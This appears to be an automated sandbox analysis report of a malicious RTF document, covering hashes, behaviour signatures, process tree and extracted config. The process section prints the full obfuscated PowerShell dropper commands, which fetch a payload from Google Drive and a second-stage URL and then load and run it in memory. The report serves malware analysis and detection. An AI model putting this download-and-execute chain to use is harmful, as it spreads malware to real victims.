Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
29/10/2024, 13:37
Static task
static1
Behavioral task
behavioral1
Sample
withnicethingswhichgivingbestthingstogetmebackwith_________verynicegoodthingsformygirlsherewithmegre.rtf
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
withnicethingswhichgivingbestthingstogetmebackwith_________verynicegoodthingsformygirlsherewithmegre.rtf
Resource
win10v2004-20241007-en
General
-
Target
withnicethingswhichgivingbestthingstogetmebackwith_________verynicegoodthingsformygirlsherewithmegre.rtf
-
Size
114KB
-
MD5
6fe3c24853e9de94688a2311999ba946
-
SHA1
c4383b6caefcb3050ee009394ed1ae07c4f8fd6e
-
SHA256
15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547
-
SHA512
a1b12f0e1a44d7743d6159f71ab116c8b9e8499cb2d52bc8d1ae3e9f6bc91c3f16788c9be5526052f6bb23b65ceb730a9a46fa2ccd07de05dc30d51f7e9e81a3
-
SSDEEP
768:u+e7d8wnZX6sQ1j3ArcSGCTl4JkwHKTZ/rR7APQ8c:J/wnZ9Q1UrJWHaFAPQ3
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2244 EQNEDT32.EXE 6 2848 powershell.exe 8 2848 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2836 powershell.exe 2848 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2244 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1124 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2836 powershell.exe 2848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1124 WINWORD.EXE 1124 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2828 2244 EQNEDT32.EXE 32 PID 2244 wrote to memory of 2828 2244 EQNEDT32.EXE 32 PID 2244 wrote to memory of 2828 2244 EQNEDT32.EXE 32 PID 2244 wrote to memory of 2828 2244 EQNEDT32.EXE 32 PID 2828 wrote to memory of 2836 2828 WScript.exe 33 PID 2828 wrote to memory of 2836 2828 WScript.exe 33 PID 2828 wrote to memory of 2836 2828 WScript.exe 33 PID 2828 wrote to memory of 2836 2828 WScript.exe 33 PID 2836 wrote to memory of 2848 2836 powershell.exe 36 PID 2836 wrote to memory of 2848 2836 powershell.exe 36 PID 2836 wrote to memory of 2848 2836 powershell.exe 36 PID 2836 wrote to memory of 2848 2836 powershell.exe 36 PID 1124 wrote to memory of 1276 1124 WINWORD.EXE 38 PID 1124 wrote to memory of 1276 1124 WINWORD.EXE 38 PID 1124 wrote to memory of 1276 1124 WINWORD.EXE 38 PID 1124 wrote to memory of 1276 1124 WINWORD.EXE 38
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\withnicethingswhichgivingbestthingstogetmebackwith_________verynicegoodthingsformygirlsherewithmegre.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1276
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptiontogetbetterthings.vBs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVuVjpjb21zUEVjWzQsMjYsMjVdLUpPSU4nJykgKCgnTlY1aW1hZ2VVcmwgPSBuZjAnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBuZjA7TlY1Jysnd2ViQ2xpZW50ID0gTmV3LU8nKydiamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtOVjVpbWFnZUJ5JysndGVzJysnID0gTlY1d2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShOVjVpbWFnZVVybCk7TlY1aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoTlY1aScrJ21hZ2VCeXRlcyk7TlY1c3RhcnRGbCcrJ2FnID0gbmYwPDxCQVNFNjRfU1RBUlQ+Pm4nKydmMDtOVjVlbmRGbGFnID0gbmYwPDxCQVNFNjRfRU5EPj5uZjA7TlY1c3RhcnRJbmQnKydleCA9IE5WNWltYWdlVGV4dC5JbmRleE9mKE5WNXN0YXJ0RmwnKydhZyk7TlY1ZW5kSW5kZXggPSBOVjVpbWFnZVRleHQuJysnSW5kZScrJ3hPZihOVjUnKydlbmRGbGFnKTtOVjVzdGFyJysndEluZGV4IC1nZSAwIC1hbmQgTlY1ZW5kSW5kZXggLWd0IE5WNXN0YXJ0SW5kZXg7TlY1Jysnc3RhcicrJ3RJbmRleCArPSBOVjVzdGFydEZsYWcuTGVuZ3RoO05WNWJhc2U2NExlbmd0aCA9IE5WNWVuZEluZGV4IC0gTlY1c3RhcnRJbicrJ2RleCcrJztOVjViYXNlNjRDb21tYW5kID0gTlY1aW1hZ2VUZXh0LlN1YnN0cmknKyduZyhOVjVzdGFydEluZGV4LCBOVjViYXNlNjRMZW5ndGgpO05WNWJhJysnc2U2NFJldmVyc2VkID0gLWpvaW4gKE5WNWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqMW0gRm9yRWFjaC1PYmplY3QgeyBOVjVfIH0pJysnWy0xLicrJy4tKE5WNWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07TlY1Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFMnKyd0cmluZyhOVjViYXNlNjRSZXZlcnNlZCk7TlY1bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmwnKydlY3Rpb24uQXNzJysnZW1ibHknKyddOicrJzpMb2FkKE5WNWNvbW1hbmRCeXRlcyk7TlY1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChuZjBWQUluZjApO05WNScrJ3ZhaU1ldGhvZC5JbnYnKydva2UoTlY1bnVsbCwgQCcrJyhuZjB0eHQuREZGVEdGUlIvMDA1LzM5JysnMS42Ni4wNjEuNzEyLy86cHR0aG5mMCwgbmYwZGVzYXRpdmFkb25mMCwgbmYwZGVzYXRpdmFkb25mMCwgJysnbmYwZGVzYXRpdmFkJysnb25mMCwgbmYwQ2FzUG9sbmYwLCBuZjBkZXNhdGl2YWRvbmYwLCBuZjBkZXNhdGl2YWRvbmYwLG5mMGRlc2F0aXZhZG9uZjAsbmYwZGVzYXRpdmFkb25mMCxuZjBkZXNhdGl2YWRvJysnbmYwLG5mMGRlc2F0aXZhZG9uZjAsbmYwZGVzYXRpdmFkb25mMCxuZjAxbmYwLG5mMGRlc2F0aXZhZG8nKyduZjApKTsnKS5yZVBMYWNlKCdOVjUnLFtzdHJpTkddW0NIQVJdMzYpLnJlUExhY2UoJ2oxbScsW3N0cmlOR11bQ0hBUl0xMjQpLnJlUExhY2UoKFtDSEFSXTExMCtbQ0hBUl0xMDIrW0NIQVJdNDgpLFtzdHJpTkddW0NIQVJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $enV:comsPEc[4,26,25]-JOIN'') (('NV5imageUrl = nf0'+'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur nf0;NV5'+'webClient = New-O'+'bject System.Net.WebClient;NV5imageBy'+'tes'+' = NV5webClient.Down'+'loadData(NV5imageUrl);NV5imageText = [Sy'+'stem.Text.Encodin'+'g]::UTF8.GetString(NV5i'+'mageBytes);NV5startFl'+'ag = nf0<<BASE64_START>>n'+'f0;NV5endFlag = nf0<<BASE64_END>>nf0;NV5startInd'+'ex = NV5imageText.IndexOf(NV5startFl'+'ag);NV5endIndex = NV5imageText.'+'Inde'+'xOf(NV5'+'endFlag);NV5star'+'tIndex -ge 0 -and NV5endIndex -gt NV5startIndex;NV5'+'star'+'tIndex += NV5startFlag.Length;NV5base64Length = NV5endIndex - NV5startIn'+'dex'+';NV5base64Command = NV5imageText.Substri'+'ng(NV5startIndex, NV5base64Length);NV5ba'+'se64Reversed = -join (NV5base64Command.ToCharArray() j1m ForEach-Object { NV5_ })'+'[-1.'+'.-(NV5base64Command.Length)];NV5commandBytes = [System.Convert]::FromBase64S'+'tring(NV5base64Reversed);NV5loadedAssembly = [System.Refl'+'ection.Ass'+'embly'+']:'+':Load(NV5commandBytes);NV5vaiMethod = [dnlib.IO.Home].GetMethod(nf0VAInf0);NV5'+'vaiMethod.Inv'+'oke(NV5null, @'+'(nf0txt.DFFTGFRR/005/39'+'1.66.061.712//:ptthnf0, nf0desativadonf0, nf0desativadonf0, '+'nf0desativad'+'onf0, nf0CasPolnf0, nf0desativadonf0, nf0desativadonf0,nf0desativadonf0,nf0desativadonf0,nf0desativado'+'nf0,nf0desativadonf0,nf0desativadonf0,nf01nf0,nf0desativado'+'nf0));').rePLace('NV5',[striNG][CHAR]36).rePLace('j1m',[striNG][CHAR]124).rePLace(([CHAR]110+[CHAR]102+[CHAR]48),[striNG][CHAR]39) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a8bc015dc157e9ddf8d5858c3a46877a
SHA12239aae43957febd0552bb8fc73a13c859cf99f1
SHA2563a3c0fb899e450e89f78cde20ff0f1fad16ad58bc8a843790e5edc2d34f1c92d
SHA51229bf69fa67f629834b0db2d0882d4bef6e4b040c19a5df5e95dc3b6177e78b137dc3d8d366d72a72ca9930e44461f3c3dc7a806300de22e91f09f9db185b05a7
-
Filesize
137KB
MD5b449b07c0e73637082cf0ce69ed3de96
SHA1c034c97173223611719127c25f416d20f80a8227
SHA256667c141e33d78452d648708f5d618fcc1ca4ddee2c8e85a445e612004ce39b9d
SHA5120036936f7786b2f6102dfc99bd37866cb48def0849c638de2fc0b02d0b3020c225941395881b44cbe24422569e51f9f864505f6a04fc18734327d4babb2c5014